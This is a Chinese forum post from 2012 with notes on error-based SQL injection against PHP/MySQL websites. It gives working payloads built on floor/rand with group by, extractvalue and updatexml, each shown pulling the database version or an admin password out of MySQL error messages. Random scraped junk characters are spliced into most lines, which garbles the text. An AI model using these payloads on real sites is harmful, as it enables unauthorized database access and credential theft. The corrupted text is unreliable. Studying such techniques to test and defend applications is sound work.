放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
) U- M, } U' D- J4 q4 w5 \* a实际测试环境:* i. j+ x( t' V& x9 e# u x, w
1 L" P" _; A r3 U, D
U$ {% ?: b' rmysql> show tables;
4 B* d7 R& I c( S- ]! `+----------------+
* H" O K; J! |4 [4 a6 t| Tables_in_test |
U& G. v- ~6 J! q& @& E+----------------+
8 j7 j }# j) [- [9 B$ {9 N| admin |
" P7 q+ c9 E! I" P) H U9 || article |
3 a& S% z$ e% M6 ]+ Y9 |+ p+----------------+
# \+ M+ e0 `: e% X$ F" K! o + Q2 w @ m' w' {1 ?
( ]( l0 Z1 L' Z% A- `5 y
% J2 X* Q9 N J- T& Mmysql> describe admin;
- D( J% x- u+ f7 I2 {- @+-------+------------------+------+-----+---------+----------------+
8 U4 s1 ` Q& x) a5 p5 I# r| Field | Type | Null | Key | Default | Extra |
$ C" K$ X1 T2 M* Z4 s+-------+------------------+------+-----+---------+----------------+* Q* B, ~) ?. r8 a5 X) w
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
' B, n" Z/ `5 V, l| user | varchar(50) | NO | | NULL | |, p) J4 B0 b/ J
| pass | varchar(50) | NO | | NULL | |# n3 s0 [* c4 I6 y ]) I
+-------+------------------+------+-----+---------+----------------+
$ A$ U3 u3 T) @# q# [) R
+ N* a+ @9 N7 c6 R% e* v8 c8 p: O4 F
1 C8 F" O; Y/ z" S 8 H1 k5 F) w4 w9 E' u. q
mysql> describe article;* {* w$ Y, Q6 ^) N
+---------+------------------+------+-----+---------+----------------+
$ _6 R" ^5 f- Y9 y* y: I| Field | Type | Null | Key | Default | Extra |: \7 d" x7 f5 l' o( J$ v
+---------+------------------+------+-----+---------+----------------+ Z( o$ w b p
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
@" i! [; [4 L' J8 q| title | varchar(50) | NO | | NULL | |
- C. w8 c9 A1 r9 || content | varchar(50) | NO | | NULL | |$ x' ^" ]; P: Y6 w$ @3 T8 k9 h- G
+---------+------------------+------+-----+---------+----------------+
6 l9 H" E: s" u' v1、通过floor报错' V, e- o J1 x. w. Y* V
可以通过如下一些利用代码
* ^+ Z/ V1 e; {* `6 W - {3 m6 z8 ~! `: z
4 P! i- r! p8 {' m) ~' }% T0 B1 H% {and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x/ ?1 i# d" r6 O6 D0 Q
from information_schema.tables group by x)a);0 e4 ^0 q- |" ^6 @. J0 M3 T
" x/ Y3 v5 q$ M) n* D7 r 0 u4 K3 F6 M6 P, H
and (select count(*) from (select 1 union select null union select !1)x4 G( ^4 i" Z1 c& p* Q8 m
group by concat((select table_name from information_schema.tables limit 1),& E- h4 u B6 B% v
floor(rand(0)*2)));6 D, J- f$ S( A) M8 r n3 F+ k0 W
举例如下:5 i! m/ U3 m( g# M* \
首先进行正常查询:/ k0 C! t8 l/ x" y; W
; y9 _* T2 x8 C3 y0 n* Imysql> select * from article where id = 1;
# M9 X% h9 T a5 b- k+----+-------+---------+
( J$ J3 s, S! h+ ]2 d |2 e| id | title | content |
% u9 B2 J* S0 Z& R$ W2 k i+----+-------+---------+' V0 K/ Q6 |" p6 j/ }
| 1 | test | do it |4 ]0 F' s1 U- y, g2 D
+----+-------+---------+
; D3 u% v% T, n7 K2 C& R% N假如id输入存在注入的话,可以通过如下语句进行报错。
9 r! [' t, N5 e! E- ?3 \7 q$ s( U. } % B) n3 Y% c% o2 Y: _
8 F* f4 @* b, m7 r! P
mysql> select * from article where id = 1 and (select 1 from% Z5 M4 @" e* Q P8 m* i
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
/ G' q- y- }( G3 s* v/ F& x8 Q; V3 {ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
2 c9 T& |3 k) _* W. `9 S' H可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
' p8 U) Z# O: {7 N0 d3 W$ w8 h例如我们需要查询管理员用户名和密码:) I& \3 h( e3 T* Y+ n) U' ~) I
Method1:
0 C# Y, T# a4 g& \) Q$ \ 8 j, ~$ w/ ], n3 w
: Z: n5 J" S# k+ y
mysql> select * from article where id = 1 and (select 1 from+ |4 g, B5 ^ k8 b4 g
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
7 v% U, f& [5 x# I Wfrom information_schema.tables group by x)a);
, z+ w1 d& ~2 p9 p4 R$ QERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
; N0 Y. R2 J8 c; R8 s& N7 UMethod2:4 F3 P$ l3 X* \/ |1 W( D( P
2 G& X- u: s" U) H# O, @
, P9 ^ ? a/ S. V1 E) Z& K2 @mysql> select * from article where id = 1 and (select count(*)
( E9 j3 b; h4 |, Q4 ~$ m9 \5 c) Mfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),& o. ~+ _8 m1 m0 l/ s! R) C
floor(rand(0)*2)));. M/ H" l( ]1 g+ }0 G. t
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
5 W4 t+ e; f& Q0 h0 Z, X9 t2、ExtractValue4 f$ F) X4 z( p( W$ k. @$ r5 V* X
测试语句如下
+ j7 I1 J1 Y/ @4 C8 p
/ L2 x; j) {. T( R% A# C5 t, Z9 V 6 v: H' X! |7 ^) c) N: h4 _
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
7 U& X3 l) O) d) }实际测试过程6 [4 K: {9 x9 y
: r$ Y' c6 w1 L, |6 P+ r& n
8 O# n8 @" k$ V$ S* X( q5 g( c: m; j6 m
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,5 k( G" H3 N6 w6 B* O
(select pass from admin limit 1)));--! }6 ?$ S9 ?1 g5 j6 t; H7 R4 j
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
6 R, w0 L/ v) m0 M/ J6 w( U! E5 p3、UpdateXml3 f3 x/ @6 {) U) _; M7 h/ m ]
测试语句7 i: X7 z; U4 g' k- M
. D! Z) A+ W: i
, Q; k, B3 p8 N( a. ]and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
% U. E1 q2 { |+ K6 T, y实际测试过程# A D) w# R3 e0 x- y
5 V! J0 X9 j/ `4 Y: i# l2 N
3 }4 q0 X2 C3 N7 f; Mmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
$ L0 n# l4 C7 U3 f# ~, P8 U! {9 x(select pass from admin limit 1),0x5e24),1));( h) J& `* w* O' N) M; ~# Y
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
9 a+ q, M0 G( t- t& ~& |7 O- p' A8 wAll, thanks foreign guys./ p7 r5 G( G6 `
* i* ]% g" D/ B% z0 P
1 n+ \9 E- Y0 L4 c0 M |
发表于 2012-12-10 10:28:51
收藏
支持
反对